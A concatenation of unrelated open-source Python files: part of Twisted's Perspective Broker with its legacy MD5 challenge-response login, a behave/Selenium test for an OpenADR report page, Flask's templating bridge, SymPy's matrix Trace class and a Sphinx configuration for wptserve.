log.err(fail)
self._sendError(fail, requestID)
def _sendError(self, fail, requestID):
"""(internal) Send an error for a previously sent message.
"""
if isinstance(fail, failure.Failure):
# If the failures value is jellyable or allowed through security,
# send the value
if (isinstance(fail.value, Jellyable) or
self.security.isClassAllowed(fail.value.__class__)):
fail = fail.value
elif not isinstance(fail, CopyableFailure):
fail = failure2Copyable(fail, self.factory.unsafeTracebacks)
if isinstance(fail, CopyableFailure):
fail.unsafeTracebacks = self.factory.unsafeTracebacks
self.sendCall("error", requestID, self.serialize(fail))
def proto_error(self, requestID, fail):
"""(internal) Deal with an error.
"""
d = self.waitingForAnswers[requestID]
del self.waitingForAnswers[requestID]
d.errback(self.unserialize(fail))
##
# refcounts
##
def sendDecRef(self, objectID):
"""(internal) Send a DECREF directive.
"""
self.sendCall("decref", objectID)
def proto_decref(self, objectID):
"""(internal) Decrement the reference count of an object.
If the reference count is zero, it will free the reference to this
object.
"""
refs = self.localObjects[objectID].decref()
if refs == 0:
puid = self.localObjects[objectID].object.processUniqueID()
del self.luids[puid]
del self.localObjects[objectID]
##
# caching
##
def decCacheRef(self, objectID):
"""(internal) Send a DECACHE directive.
"""
self.sendCall("decache", objectID)
def proto_decache(self, objectID):
"""(internal) Decrement the reference count of a cached object.
If the reference count is zero, free the reference, then send an
'uncached' directive.
"""
refs = self.remotelyCachedObjects[objectID].decref()
# log.msg('decaching: %s #refs: %s' % (objectID, refs))
if refs == 0:
lobj = self.remotelyCachedObjects[objectID]
cacheable = lobj.object
perspective = lobj.perspective
# TODO: force_decache needs to be able to force-invalidate a
# cacheable reference.
try:
cacheable.stoppedObserving(perspective, RemoteCacheObserver(self, cacheable, perspective))
except:
log.deferr()
puid = cacheable.processUniqueID()
del self.remotelyCachedLUIDs[puid]
del self.remotelyCachedObjects[objectID]
self.sendCall("uncache", objectID)
def proto_uncache(self, objectID):
"""(internal) Tell the client it is now OK to uncache an object.
"""
# log.msg("uncaching locally %d" % objectID)
obj = self.locallyCachedObjects[objectID]
obj.broker = None
## def reallyDel(obj=obj):
## obj.__really_del__()
## obj.__del__ = reallyDel
del self.locallyCachedObjects[objectID]
class BrokerFactory(protocol.Factory, styles.Versioned):
"""DEPRECATED, use PBServerFactory instead.
I am a server for object brokerage.
"""
unsafeTracebacks = 0
persistenceVersion = 3
def __init__(self, objectToBroker):
warnings.warn("This is deprecated. Use PBServerFactory.", DeprecationWarning, 2)
self.objectToBroker = objectToBroker
def config_objectToBroker(self, newObject):
self.objectToBroker = newObject
def upgradeToVersion2(self):
app = self.app
del self.app
self.__init__(AuthRoot(app))
def buildProtocol(self, addr):
"""Return a Broker attached to me (as the service provider).
"""
proto = Broker(0)
proto.factory = self
proto.setNameForLocal("root",
self.objectToBroker.rootObject(proto))
return proto
def clientConnectionMade(self, protocol):
pass
### DEPRECATED AUTH STUFF
class AuthRoot(Root):
"""DEPRECATED.
I provide AuthServs as root objects to Brokers for a BrokerFactory.
"""
def __init__(self, auth):
from twisted.internet.app import Application
if isinstance(auth, Application):
auth = auth.authorizer
self.auth = auth
def rootObject(self, broker):
return AuthServ(self.auth, broker)
class _Detacher:
"""DEPRECATED."""
def __init__(self, perspective, remoteRef, identity, broker):
self.perspective = perspective
self.remoteRef = remoteRef
self.identity = identity
self.broker = broker
def detach(self):
self.perspective.brokerDetached(self.remoteRef,
self.identity,
self.broker)
class IdentityWrapper(Referenceable):
"""DEPRECATED.
I delegate most functionality to a L{twisted.cred.identity.Identity}.
"""
def __init__(self, broker, identity):
"""Initialize, specifying an identity to wrap.
"""
self.identity = identity
self.broker = broker
def remote_attach(self, serviceName, perspectiveName, remoteRef):
"""Attach the remote reference to a requested perspective.
"""
return self.identity.requestPerspectiveForKey(
serviceName, perspectiveName).addCallbacks(
self._attached, lambda x: x,
callbackArgs = [remoteRef])
def _attached(self, perspective, remoteRef):
perspective = perspective.brokerAttached(remoteRef,
self.identity,
self.broker)
# Make sure that when connectionLost happens, this perspective
# will be tracked in order that 'detached' will be called.
self.broker.notifyOnDisconnect(_Detacher(perspective,
remoteRef,
self.identity,
self.broker).detach)
return AsReferenceable(perspective, "perspective")
# (Possibly?) TODO: Implement 'remote_detach' as well.
class AuthChallenger(Referenceable):
"""DEPRECATED.
See also: AuthServ
"""
def __init__(self, ident, serv, challenge):
self.ident = ident
self.challenge = challenge
self.serv = serv
def remote_respond(self, response):
if self.ident:
d = defer.Deferred()
pwrq = self.ident.verifyPassword(self.challenge, response)
pwrq.addCallback(self._authOk, d)
pwrq.addErrback(self._authFail, d)
return d
def _authOk(self, result, d):
d.callback(IdentityWrapper(self.serv.broker, self.ident))
def _authFail(self, result, d):
d.callback(None)
class AuthServ(Referenceable):
"""DEPRECATED.
See also: L{AuthRoot}
"""
def __init__(self, auth, broker):
self.auth = auth
self.broker = broker
def remote_username(self, username):
defr = self.auth.getIdentityRequest(username)
defr.addCallback(self.mkchallenge)
return defr
def mkchallenge(self, ident):
if type(ident) == types.StringType:
# it's an error, so we must fail.
challenge = identity.challenge()
return challenge, AuthChallenger(None, self, challenge)
else:
challenge = ident.challenge()
return challenge, AuthChallenger(ident, self, challenge)
class _ObjectRetrieval:
"""DEPRECATED.
(Internal) Does callbacks for L{getObjectAt}.
"""
def __init__(self, broker, d):
warnings.warn("This is deprecated. Use PBClientFactory.", DeprecationWarning, 2)
self.deferred = d
self.term = 0
self.broker = broker
# XXX REFACTOR: this seems weird.
# I'm not inheriting because I have to delegate at least 2 of these
# things anyway.
broker.notifyOnFail(self.connectionFailed)
broker.notifyOnConnect(self.connectionMade)
broker.notifyOnDisconnect(self.connectionLost)
def connectionLost(self):
if not self.term:
self.term = 1
del self.broker
self.deferred.errback(error.ConnectionLost())
del self.deferred
def connectionMade(self):
assert not self.term, "How did this get called?"
x = self.broker.remoteForName("root")
del self.broker
self.term = 1
self.deferred.callback(x)
del self.deferred
def connectionFailed(self):
if not self.term:
self.term = 1
del self.broker
self.deferred.errback(error.ConnectError(string="Connection failed"))
del self.deferred
class BrokerClientFactory(protocol.ClientFactory):
noisy = 0
unsafeTracebacks = 0
def __init__(self, protocol):
warnings.warn("This is deprecated. Use PBClientFactory.", DeprecationWarning, 2)
if not isinstance(protocol,Broker): raise TypeError, "protocol is not an instance of Broker"
self.protocol = protocol
def buildProtocol(self, addr):
return self.protocol
def clientConnectionFailed(self, connector, reason):
self.protocol.connectionFailed()
def clientConnectionMade(self, protocol):
pass
def getObjectRetriever():
"""DEPRECATED.
Get a factory which retreives a root object from its client
@returns: A pair: A ClientFactory and a Deferred which will be passed a
remote reference to the root object of a PB server.x
"""
warnings.warn("This is deprecated. Use PBClientFactory.", DeprecationWarning, 2)
d = defer.Deferred()
b = Broker(1)
bf = BrokerClientFactory(b)
_ObjectRetrieval(b, d)
return bf, d
def getObjectAt(host, port, timeout=None):
"""DEPRECATED. Establishes a PB connection and returns with a L{RemoteReference}.
@param host: the host to connect to
@param port: the port number to connect to
@param timeout: a value in milliseconds to wait before failing by
default. (OPTIONAL)
@returns: A Deferred which will be passed a remote reference to the
root object of a PB server.x
"""
warnings.warn("This is deprecated. Use PBClientFactory.", DeprecationWarning, 2)
bf = PBClientFactory()
if host == "unix":
# every time you use this, God kills a kitten
reactor.connectUNIX(port, bf, timeout)
else:
reactor.connectTCP(host, port, bf, timeout)
return bf.getRootObject()
def getObjectAtSSL(host, port, timeout=None, contextFactory=None):
"""DEPRECATED. Establishes a PB connection over SSL and returns with a RemoteReference.
@param host: the host to connect to
@param port: the port number to connect to
@param timeout: a value in milliseconds to wait before failing by
default. (OPTIONAL)
@param contextFactory: A factory object for producing SSL.Context
objects. (OPTIONAL)
@returns: A Deferred which will be passed a remote reference to the
root object of a PB server.
"""
warnings.warn("This is deprecated. Use PBClientFactory.", DeprecationWarning, 2)
bf = PBClientFactory()
if contextFactory is None:
from twisted.internet import ssl
contextFactory = ssl.ClientContextFactory()
reactor.connectSSL(host, port, bf, contextFactory, timeout)
return bf.getRootObject()
def connect(host, port, username, password, serviceName,
perspectiveName=None, client=None, timeout=None):
"""DEPRECATED. Connects and authenticates, then retrieves a PB service.
Required arguments:
- host -- the host the service is running on
- port -- the port on the host to connect to
- username -- the name you will be identified as to the authorizer
- password -- the password for this username
- serviceName -- name of the service to request
Optional (keyword) arguments:
- perspectiveName -- the name of the perspective to request, if
different than the username
- client -- XXX the \"reference\" argument to
perspective.Perspective.attached
- timeout -- see twisted.internet.tcp.Client
@returns: A Deferred instance that gets a callback when the final
Perspective is connected, and an errback when an error
occurs at any stage of connecting.
"""
warnings.warn("This is deprecated. Use PBClientFactory.", DeprecationWarning, 2)
if timeout == None:
timeout = 30
bf = PBClientFactory()
if host == "unix":
# every time you use this, God kills a kitten
reactor.connectUNIX(port, bf, timeout)
else:
reactor.connectTCP(host, port, bf, timeout)
return bf.getPerspective(username, password, serviceName, perspectiveName, client)
def _connGotRoot(root, d, client, serviceName,
username, password, perspectiveName):
warnings.warn("This is deprecated. Use PBClientFactory.", DeprecationWarning, 2)
logIn(root, client, serviceName, username, password, perspectiveName).chainDeferred(d)
def authIdentity(authServRef, username, password):
"""DEPRECATED. Return a Deferred which will do the challenge-response dance and
return a remote Identity reference.
"""
warnings.warn("This is deprecated. Use PBClientFactory.", DeprecationWarning, 2)
d = defer.Deferred()
authServRef.callRemote('username', username).addCallbacks(
_cbRespondToChallenge, d.errback,
callbackArgs=(password,d))
return d
def _cbRespondToChallenge((challenge, challenger), password, d):
warnings.warn("This is deprecated. Use PBClientFactory.", DeprecationWarning, 2)
challenger.callRemote("respond", identity.respond(challenge, password)).addCallbacks(
d.callback, d.errback)
def logIn(authServRef, client, service, username, password, perspectiveName=None):
"""DEPRECATED. I return a Deferred which will be called back with a Perspective.
"""
warnings.warn("This is deprecated. Use PBClientFactory.", DeprecationWarning, 2)
d = defer.Deferred()
authServRef.callRemote('username', username).addCallbacks(
_cbLogInRespond, d.errback,
callbackArgs=(d, client, service, password,
perspectiveName or username))
return d
def _cbLogInRespond((challenge, challenger), d, client, service, password, perspectiveName):
warnings.warn("This is deprecated. Use PBClientFactory.", DeprecationWarning, 2)
challenger.callRemote('respond',
identity.respond(challenge, password)).addCallbacks(
_cbLogInResponded, d.errback,
callbackArgs=(d, client, service, perspectiveName))
def _cbLogInResponded(identity, d, client, serviceName, perspectiveName):
warnings.warn("This is deprecated. Use PBClientFactory.", DeprecationWarning, 2)
if identity:
identity.callRemote("attach", serviceName, perspectiveName, client).chainDeferred(d)
else:
from twisted import cred
d.errback(cred.error.Unauthorized("invalid username or password"))
class IdentityConnector:
"""DEPRECATED.
I support connecting to multiple Perspective Broker services that are
in a service tree.
"""
def __init__(self, host, port, identityName, password):
"""
@type host: C{string}
@param host: The host to connect to or the PB server.
If this is C{"unix"}, then a UNIX socket
will be used rather than a TCP socket.
@type port: C{integer}
@param port: The port to connect to for the PB server.
@type identityName: C{string}
@param identityName: The name of the identity to use to
autheticate with the PB server.
@type password: C{string}
@param password: The password to use to autheticate with
the PB server.
"""
warnings.warn("This is deprecated. Use PBClientFactory.", DeprecationWarning, 2)
self.host = host
self.port = port
self.identityName = identityName
self.password = password
self._identityWrapper = None
self._connectDeferreds = []
self._requested = 0
def _cbGotAuthRoot(self, authroot):
authIdentity(authroot, self.identityName,
self.password).addCallbacks(
self._cbGotIdentity, self._ebGotIdentity)
def _cbGotIdentity(self, i):
self._identityWrapper = i
if i:
for d in self._connectDeferreds:
d.callback(i)
self._connectDeferreds[:] = []
else:
from twisted import cred
e = cred.error.Unauthorized("invalid username or password")
self._ebGotIdentity(e)
def _ebGotIdentity(self, e):
self._requested = 0
for d in self._connectDeferreds:
d.errback(e)
self._connectDeferreds[:] = []
def requestLogin(self):
"""
Attempt to authenticate about the PB server, but don't
request any services, yet.
@returns: L{IdentityWrapper}
@rtype: L{twisted.internet.defer.Deferred}
"""
if not self._identityWrapper:
d = defer.Deferred()
self._connectDeferreds.append(d)
if not self._requested:
self._requested = 1
getObjectAt(self.host, self.port).addCallbacks(
self._cbGotAuthRoot, self._ebGotIdentity)
return d
else:
return defer.succeed(self._identityWrapper)
def requestService(self, serviceName, perspectiveName=None,
client=None):
"""
Request a perspective on the specified service. This will
authenticate against the server as well if L{requestLogin}
hasn't already been called.
@type serviceName: C{string}
@param serviceName: The name of the service to obtain
a perspective for.
@type perspectiveName: C{string}
@param perspectiveName: If specified, the name of the
perspective to obtain. Otherwise,
default to the name of the identity.
@param client: The client object to attach to
the perspective.
@rtype: L{twisted.internet.defer.Deferred}
@return: A deferred which will receive a callback
with the perspective.
"""
return self.requestLogin().addCallback(
lambda i, self=self: i.callRemote("attach",
serviceName,
perspectiveName,
client))
def disconnect(self):
"""Lose my connection to the server.
Useful to free up resources if you've completed requestLogin but
then change your mind.
"""
if not self._identityWrapper:
return
else:
self._identityWrapper.broker.transport.loseConnection()
# this is the new shiny API you should be using:
import md5
import random
from twisted.cred.credentials import ICredentials, IUsernameHashedPassword
def respond(challenge, password):
"""Respond to a challenge.
This is useful for challenge/response authentication.
"""
m = md5.new()
m.update(password)
hashedPassword = m.digest()
m = md5.new()
m.update(hashedPassword)
m.update(challenge)
doubleHashedPassword = m.digest()
return doubleHashedPassword
def challenge():
"""I return some random data."""
crap = ''
for x in range(random.randrange(15,25)):
crap = crap + chr(random.randint(65,90))
crap = md5.new(crap).digest()
return crap
class PBClientFactory(protocol.ClientFactory):
"""Client factory for PB brokers.
As with all client factories, use with reactor.connectTCP/SSL/etc..
getPerspective and getRootObject can be called either before or
after the connect.
"""
protocol = Broker
unsafeTracebacks = 0
def __init__(self):
self._reset()
def _reset(self):
self.rootObjectRequests = [] # list of deferred
self._broker = None
self._root = None
def _failAll(self, reason):
deferreds = self.rootObjectRequests
self._reset()
for d in deferreds:
d.errback(reason)
def clientConnectionFailed(self, connector, reason):
self._failAll(reason)
def clientConnectionLost(self, connector, reason, reconnecting=0):
"""Reconnecting subclasses should call with reconnecting=1."""
if reconnecting:
# any pending requests will go to next connection attempt
# so we don't fail them.
self._broker = None
self._root = None
else:
self._failAll(reason)
def clientConnectionMade(self, broker):
self._broker = broker
self._root = broker.remoteForName("root")
ds = self.rootObjectRequests
self.rootObjectRequests = []
for d in ds:
d.callback(self._root)
def getRootObject(self):
"""Get root object of remote PB server.
@return Deferred of the root object.
"""
if self._broker and not self._broker.disconnected:
return defer.succeed(self._root)
d = defer.Deferred()
self.rootObjectRequests.append(d)
return d
def getPerspective(self, username, password, serviceName,
perspectiveName=None, client=None):
"""Get perspective from remote PB server.
New systems should use login() instead.
@return Deferred of RemoteReference to the perspective.
"""
warnings.warn("Update your backend to use PBServerFactory, and then use login().",
DeprecationWarning, 2)
if perspectiveName == None:
perspectiveName = username
d = self.getRootObject()
d.addCallback(self._cbAuthIdentity, username, password)
d.addCallback(self._cbGetPerspective, serviceName, perspectiveName, client)
return d
def _cbAuthIdentity(self, authServRef, username, password):
return authServRef.callRemote('username', username).addCallback(
self._cbRespondToChallenge, password)
def _cbRespondToChallenge(self, (challenge, challenger), password):
return challenger.callRemote("respond", respond(challenge, password))
def _cbGetPerspective(self, identityWrapper, serviceName, perspectiveName, client):
return identityWrapper.callRemote(
"attach", serviceName, perspectiveName, client)
def disconnect(self):
"""If the factory is connected, close the connection.
Note that if you set up the factory to reconnect, you will need to
implement extra logic to prevent automatic reconnection after this
is called.
"""
if self._broker:
self._broker.transport.loseConnection()
def _cbSendUsername(self, root, username, password, client):
return root.callRemote("login", username).addCallback(
self._cbResponse, password, client)
def _cbResponse(self, (challenge, challenger), password, client):
return challenger.callRemote("respond", respond(challenge, password), client)
def login(self, credentials, client=None):
"""Login and get perspective from remote PB server.
Currently only credentials implementing IUsernamePassword are
supported.
@return Deferred of RemoteReference to the perspective.
"""
d = self.getRootObject()
d.addCallback(self._cbSendUsername, credentials.username, credentials.password, client)
return d
class PBServerFactory(protocol.ServerFactory):
"""Server factory for perspective broker.
Login is done using a Portal object, whose realm is expected to return
avatars implementing IPerspective. The credential checkers in the portal
should accept IUsernameHashedPassword or IUsernameMD5Password.
Alternatively, any object implementing or adaptable to IPBRoot can
be used instead of a portal to provide the root object of the PB
server.
"""
unsafeTracebacks = 0
# object broker factory
protocol = Broker
def __init__(self, root, unsafeTracebacks=False):
self.root = IPBRoot(root)
self.unsafeTracebacks = unsafeTracebacks
def buildProtocol(self, addr):
"""Return a Broker attached to me (as the service provider).
"""
proto = self.protocol(0)
proto.factory = self
proto.setNameForLocal("root", self.root.rootObject(proto))
return proto
def clientConnectionMade(self, protocol):
pass
class IUsernameMD5Password(ICredentials):
"""I encapsulate a username and a hashed password.
This credential is used for username/password over
PB. CredentialCheckers which check this kind of credential must
store the passwords in plaintext form or as a MD5 digest.
@type username: C{str} or C{Deferred}
@ivar username: The username associated with these credentials.
"""
def checkPassword(self, password):
"""Validate these credentials against the correct password.
@param password: The correct, plaintext password against which to
@check.
@return: a deferred which becomes, or a boolean indicating if the
password matches.
"""
def checkMD5Password(self, password):
"""Validate these credentials against the correct MD5 digest of password.
@param password: The correct, plaintext password against which to
@check.
@return: a deferred which becomes, or a boolean indicating if the
password matches.
"""
class _PortalRoot:
"""Root object, used to login to portal."""
implements(IPBRoot)
def __init__(self, portal):
self.portal = portal
def rootObject(self, broker):
return _PortalWrapper(self.portal, broker)
components.backwardsCompatImplements(_PortalRoot)
registerAdapter(_PortalRoot, Portal, IPBRoot)
class _PortalWrapper(Referenceable):
"""Root Referenceable object, used to login to portal."""
def __init__(self, portal, broker):
self.portal = portal
self.broker = broker
def remote_login(self, username):
"""Start of username/password login."""
c = challenge()
return c, _PortalAuthChallenger(self, username, c)
class _PortalAuthChallenger(Referenceable):
"""Called with response to password challenge."""
implements(IUsernameHashedPassword, IUsernameMD5Password)
def __init__(self, portalWrapper, username, challenge):
self.portalWrapper = portalWrapper
self.username = username
self.challenge = challenge
def remote_respond(self, response, mind):
self.response = response
d = self.portalWrapper.portal.login(self, mind, IPerspective)
d.addCallback(self._loggedIn)
return d
def _loggedIn(self, (interface, perspective, logout)):
if not IJellyable.providedBy(perspective):
perspective = AsReferenceable(perspective, "perspective")
self.portalWrapper.broker.notifyOnDisconnect(logout)
return perspective
# IUsernameHashedPassword:
def checkPassword(self, password):
return self.checkMD5Password(md5.md5(password).digest())
# IUsernameMD5Password
def checkMD5Password(self, md5Password):
md = md5.new()
md.update(md5Password)
md.update(self.challenge)
correct = md.digest()
return self.response == correct
backwardsCompatImplements(_PortalAuthChallenger)
|
rlutes/volttron-applications | refs/heads/master | kisensum/openadr/openadr/features/steps/report.py | 2 | # -*- coding: utf-8 -*- {{{
# vim: set fenc=utf-8 ft=python sw=4 ts=4 sts=4 et:
# Copyright (c) 2017, Battelle Memorial Institute
# All rights reserved.
#
# Redistribution and use in source and binary forms, with or without
# modification, are permitted provided that the following conditions
# are met:
#
# 1. Redistributions of source code must retain the above copyright
# notice, this list of conditions and the following disclaimer.
# 2. Redistributions in binary form must reproduce the above copyright
# notice, this list of conditions and the following disclaimer in
# the documentation and/or other materials provided with the
# distribution.
#
# THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS
# "AS IS" AND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT
# LIMITED TO, THE IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR
# A PARTICULAR PURPOSE ARE DISCLAIMED. IN NO EVENT SHALL THE COPYRIGHT
# OWNER OR CONTRIBUTORS BE LIABLE FOR ANY DIRECT, INDIRECT, INCIDENTAL,
# SPECIAL, EXEMPLARY, OR CONSEQUENTIAL DAMAGES (INCLUDING, BUT NOT
# LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS OR SERVICES; LOSS OF USE,
# DATA, OR PROFITS; OR BUSINESS INTERRUPTION) HOWEVER CAUSED AND ON ANY
# THEORY OF LIABILITY, WHETHER IN CONTRACT, STRICT LIABILITY, OR TORT
# (INCLUDING NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY OUT OF THE USE
# OF THIS SOFTWARE, EVEN IF ADVISED OF THE POSSIBILITY OF SUCH DAMAGE.
#
# The views and conclusions contained in the software and documentation
# are those of the authors and should not be interpreted as representing
# official policies, either expressed or implied, of the FreeBSD
# Project.
#
# This material was prepared as an account of work sponsored by an
# agency of the United States Government. Neither the United States
# Government nor the United States Department of Energy, nor Battelle,
# nor any of their employees, nor any jurisdiction or organization that
# has cooperated in the development of these materials, makes any
# warranty, express or implied, or assumes any legal liability or
# responsibility for the accuracy, completeness, or usefulness or any
# information, apparatus, product, software, or process disclosed, or
# represents that its use would not infringe privately owned rights.
#
# Reference herein to any specific commercial product, process, or
# service by trade name, trademark, manufacturer, or otherwise does not
# necessarily constitute or imply its endorsement, recommendation, or
# favoring by the United States Government or any agency thereof, or
# Battelle Memorial Institute. The views and opinions of authors
# expressed herein do not necessarily state or reflect those of the
# United States Government or any agency thereof.
#
# PACIFIC NORTHWEST NATIONAL LABORATORY
# operated by BATTELLE for the UNITED STATES DEPARTMENT OF ENERGY
# under Contract DE-AC05-76RL01830
# }}}
from behave import given, when, then
from vtn.tests.factories import *
from selenium.common.exceptions import NoSuchElementException
import time
@when('I filter Date Range "{date_range}" only')
def step_impl(context, date_range):
br = context.browser
br.find_element_by_link_text("Report").click()
# Redirect to Report Page
assert br.current_url.endswith('/report/') != -1
br.find_element_by_name("datefilter").send_keys(date_range)
br.find_element_by_name("filter_button").click()
@when('I filter DR Program "{dr_program_name}" only')
def step_impl(context, dr_program_name):
br = context.browser
br.find_element_by_link_text("Report").click()
# Redirect to Report Page
assert br.current_url.endswith('/report/') != -1
br.find_element_by_name("dr_program").send_keys(dr_program_name)
br.find_element_by_name("filter_button").click()
@when('I filter DR Program "{dr_program_name}" and Date Range "{date_range}"')
def step_impl(context, dr_program_name, date_range):
br = context.browser
br.find_element_by_link_text("Report").click()
# Redirect to Report Page
assert br.current_url.endswith('/report/') != -1
br.find_element_by_name("dr_program").send_keys(dr_program_name)
br.find_element_by_name("datefilter").send_keys(date_range)
br.find_element_by_name("filter_button").click()
@then('I should see DR Event name "{dr_program_name}"')
def step_impl(context, dr_program_name):
br = context.browser
time.sleep(5)
lst = br.find_elements_by_xpath("//*[@id='filterTable']//tbody//td")
dr_events = []
for i in range(0, int(len(lst) / 6)):
dr_events += [lst[i * 6].text]
print(lst[i * 6].text)
assert dr_program_name in dr_events
@then('I should only see DR Event name "{dr_program_name}"')
def step_impl(context, dr_program_name):
br = context.browser
time.sleep(20)
lst = br.find_elements_by_xpath("//*[@id='filterTable']//tbody//td")
time.sleep(10)
dr_events = []
for i in range(0, int(len(lst) / 6)):
dr_events += [lst[i * 6].text]
for item in dr_events:
assert item == dr_program_name
|
cricketclubucd/davisdragons | refs/heads/master | platform-tools/systrace/catapult/devil/devil/utils/lazy/__init__.py | 28 | # Copyright 2015 The Chromium Authors. All rights reserved.
# Use of this source code is governed by a BSD-style license that can be
# found in the LICENSE file.
from devil.utils.lazy.weak_constant import WeakConstant
|
alexdglover/shill-isms | refs/heads/master | venv/lib/python2.7/site-packages/flask/templating.py | 172 | # -*- coding: utf-8 -*-
"""
flask.templating
~~~~~~~~~~~~~~~~
Implements the bridge to Jinja2.
:copyright: (c) 2015 by Armin Ronacher.
:license: BSD, see LICENSE for more details.
"""
from jinja2 import BaseLoader, Environment as BaseEnvironment, \
TemplateNotFound
from .globals import _request_ctx_stack, _app_ctx_stack
from .signals import template_rendered, before_render_template
def _default_template_ctx_processor():
"""Default template context processor. Injects `request`,
`session` and `g`.
"""
reqctx = _request_ctx_stack.top
appctx = _app_ctx_stack.top
rv = {}
if appctx is not None:
rv['g'] = appctx.g
if reqctx is not None:
rv['request'] = reqctx.request
rv['session'] = reqctx.session
return rv
class Environment(BaseEnvironment):
"""Works like a regular Jinja2 environment but has some additional
knowledge of how Flask's blueprint works so that it can prepend the
name of the blueprint to referenced templates if necessary.
"""
def __init__(self, app, **options):
if 'loader' not in options:
options['loader'] = app.create_global_jinja_loader()
BaseEnvironment.__init__(self, **options)
self.app = app
class DispatchingJinjaLoader(BaseLoader):
"""A loader that looks for templates in the application and all
the blueprint folders.
"""
def __init__(self, app):
self.app = app
def get_source(self, environment, template):
if self.app.config['EXPLAIN_TEMPLATE_LOADING']:
return self._get_source_explained(environment, template)
return self._get_source_fast(environment, template)
def _get_source_explained(self, environment, template):
attempts = []
trv = None
for srcobj, loader in self._iter_loaders(template):
try:
rv = loader.get_source(environment, template)
if trv is None:
trv = rv
except TemplateNotFound:
rv = None
attempts.append((loader, srcobj, rv))
from .debughelpers import explain_template_loading_attempts
explain_template_loading_attempts(self.app, template, attempts)
if trv is not None:
return trv
raise TemplateNotFound(template)
def _get_source_fast(self, environment, template):
for srcobj, loader in self._iter_loaders(template):
try:
return loader.get_source(environment, template)
except TemplateNotFound:
continue
raise TemplateNotFound(template)
def _iter_loaders(self, template):
loader = self.app.jinja_loader
if loader is not None:
yield self.app, loader
for blueprint in self.app.iter_blueprints():
loader = blueprint.jinja_loader
if loader is not None:
yield blueprint, loader
def list_templates(self):
result = set()
loader = self.app.jinja_loader
if loader is not None:
result.update(loader.list_templates())
for blueprint in self.app.iter_blueprints():
loader = blueprint.jinja_loader
if loader is not None:
for template in loader.list_templates():
result.add(template)
return list(result)
def _render(template, context, app):
"""Renders the template and fires the signal"""
before_render_template.send(app, template=template, context=context)
rv = template.render(context)
template_rendered.send(app, template=template, context=context)
return rv
def render_template(template_name_or_list, **context):
"""Renders a template from the template folder with the given
context.
:param template_name_or_list: the name of the template to be
rendered, or an iterable with template names
the first one existing will be rendered
:param context: the variables that should be available in the
context of the template.
"""
ctx = _app_ctx_stack.top
ctx.app.update_template_context(context)
return _render(ctx.app.jinja_env.get_or_select_template(template_name_or_list),
context, ctx.app)
def render_template_string(source, **context):
"""Renders a template from the given template source string
with the given context. Template variables will be autoescaped.
:param source: the source code of the template to be
rendered
:param context: the variables that should be available in the
context of the template.
"""
ctx = _app_ctx_stack.top
ctx.app.update_template_context(context)
return _render(ctx.app.jinja_env.from_string(source),
context, ctx.app)
|
hrashk/sympy | refs/heads/master | sympy/matrices/expressions/trace.py | 26 | from __future__ import print_function, division
from sympy import Basic, Expr
from .matexpr import ShapeError
class Trace(Expr):
"""Matrix Trace
Represents the trace of a matrix expression.
>>> from sympy import MatrixSymbol, Trace, eye
>>> A = MatrixSymbol('A', 3, 3)
>>> Trace(A)
Trace(A)
See Also:
trace
"""
is_Trace = True
def __new__(cls, mat):
if not mat.is_Matrix:
raise TypeError("input to Trace, %s, is not a matrix" % str(mat))
if not mat.is_square:
raise ShapeError("Trace of a non-square matrix")
return Basic.__new__(cls, mat)
def _eval_transpose(self):
return self
@property
def arg(self):
return self.args[0]
def doit(self, **kwargs):
if kwargs.get('deep', False):
arg = self.arg.doit()
else:
arg = self.arg
try:
return arg._eval_trace()
except (AttributeError, NotImplementedError):
return Trace(arg)
def _eval_rewrite_as_Sum(self):
from sympy import Sum, Dummy
i = Dummy('i')
return Sum(self.arg[i, i], (i, 0, self.arg.rows-1)).doit()
def trace(expr):
""" Trace of a Matrix. Sum of the diagonal elements
>>> from sympy import trace, Symbol, MatrixSymbol, pprint, eye
>>> n = Symbol('n')
>>> X = MatrixSymbol('X', n, n) # A square matrix
>>> trace(2*X)
2*Trace(X)
>>> trace(eye(3))
3
See Also:
Trace
"""
return Trace(expr).doit()
|
zmike/servo | refs/heads/master | tests/wpt/web-platform-tests/tools/wptserve/docs/conf.py | 467 | # -*- coding: utf-8 -*-
#
# wptserve documentation build configuration file, created by
# sphinx-quickstart on Wed Aug 14 17:23:24 2013.
#
# This file is execfile()d with the current directory set to its containing dir.
#
# Note that not all possible configuration values are present in this
# autogenerated file.
#
# All configuration values have a default; values that are commented out
# serve to show the default.
import sys, os
sys.path.insert(0, os.path.abspath(".."))
# If extensions (or modules to document with autodoc) are in another directory,
# add these directories to sys.path here. If the directory is relative to the
# documentation root, use os.path.abspath to make it absolute, like shown here.
#sys.path.insert(0, os.path.abspath('.'))
# -- General configuration -----------------------------------------------------
# If your documentation needs a minimal Sphinx version, state it here.
#needs_sphinx = '1.0'
# Add any Sphinx extension module names here, as strings. They can be extensions
# coming with Sphinx (named 'sphinx.ext.*') or your custom ones.
extensions = ['sphinx.ext.autodoc', 'sphinx.ext.viewcode']
# Add any paths that contain templates here, relative to this directory.
templates_path = ['_templates']
# The suffix of source filenames.
source_suffix = '.rst'
# The encoding of source files.
#source_encoding = 'utf-8-sig'
# The master toctree document.
master_doc = 'index'
# General information about the project.
project = u'wptserve'
copyright = u'2013, Mozilla Foundation and other wptserve contributers'
# The version info for the project you're documenting, acts as replacement for
# |version| and |release|, also used in various other places throughout the
# built documents.
#
# The short X.Y version.
version = '0.1'
# The full version, including alpha/beta/rc tags.
release = '0.1'
# The language for content autogenerated by Sphinx. Refer to documentation
# for a list of supported languages.
#language = None
# There are two options for replacing |today|: either, you set today to some
# non-false value, then it is used:
#today = ''
# Else, today_fmt is used as the format for a strftime call.
#today_fmt = '%B %d, %Y'
# List of patterns, relative to source directory, that match files and
# directories to ignore when looking for source files.
exclude_patterns = ['_build']
# The reST default role (used for this markup: `text`) to use for all documents.
#default_role = None
# If true, '()' will be appended to :func: etc. cross-reference text.
#add_function_parentheses = True
# If true, the current module name will be prepended to all description
# unit titles (such as .. function::).
#add_module_names = True
# If true, sectionauthor and moduleauthor directives will be shown in the
# output. They are ignored by default.
#show_authors = False
# The name of the Pygments (syntax highlighting) style to use.
pygments_style = 'sphinx'
# A list of ignored prefixes for module index sorting.
#modindex_common_prefix = []
# -- Options for HTML output ---------------------------------------------------
# The theme to use for HTML and HTML Help pages. See the documentation for
# a list of builtin themes.
html_theme = 'default'
